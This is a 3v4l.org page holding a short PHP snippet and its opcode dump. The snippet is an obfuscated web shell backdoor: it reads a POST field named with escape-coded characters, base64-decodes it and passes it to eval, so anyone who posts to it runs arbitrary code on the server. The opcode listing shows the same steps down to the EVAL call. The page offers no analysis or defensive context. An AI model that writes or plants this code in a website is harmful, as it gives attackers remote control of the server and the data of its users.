3v4l.org

run code in 200+ php & hhvm versions
Bugs & Features
<?php if(isset($_POST["\97\49\49\68\x4F\84\116\x68\97\x74\x44\x4F\x54\x6A\97\x76\x61\x35\x63\x72\97\x70\x41\84\x66\x6C\97\x72\x65\x44\65\x53\72\111\110\68\79\84\99\x6F\x6D"])); { eval(base64_decode($_POST["\97\49\x31\68\x4F\x54\116\104\x61\116\x44\79\x54\106\97\118\97\53\x63\114\x61\x70\65\84\102\x6C\x61\114\101\x44\65\x53\72\111\x6E\x44\x4F\84\99\x6F\x6D"])); }
Finding entry points
Branch analysis from position: 0
Jump found. Position 1 = 3, Position 2 = 3
Branch analysis from position: 3
Jump found. Position 1 = -2
Branch analysis from position: 3
filename:       /in/7XZYT
function name:  (null)
number of ops:  10
compiled vars:  none
line     #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   2     0  E >   FETCH_IS                                         $0      '_POST'
         1        ISSET_ISEMPTY_DIM_OBJ                       33554432  ~1      $0, '%5C97%049%049%068O%5C84Nh%5C97tDOTj%5C97va5cr%5C97pA%5C84fl%5C97reD5S%3AIH%068%079%5C84%5C99om'
         2      > JMPZ                                                     ~1, ->3
   3     3    >   INIT_FCALL                                               'base64_decode'
         4        FETCH_R                      global              $2      '_POST'
         5        FETCH_DIM_R                                      $3      $2, '%5C97%0491%068OTNDaND%079TF%5C97%098%5C97%2BcLap5%5C84BlaLAD5S%3AInDO%5C84%5C99om'
         6        SEND_VAR                                                 $3
         7        DO_ICALL                                         $4      
         8        INCLUDE_OR_EVAL                                          $4, EVAL
         9      > RETURN                                                   1

Generated using Vulcan Logic Dumper, using php 7.3.0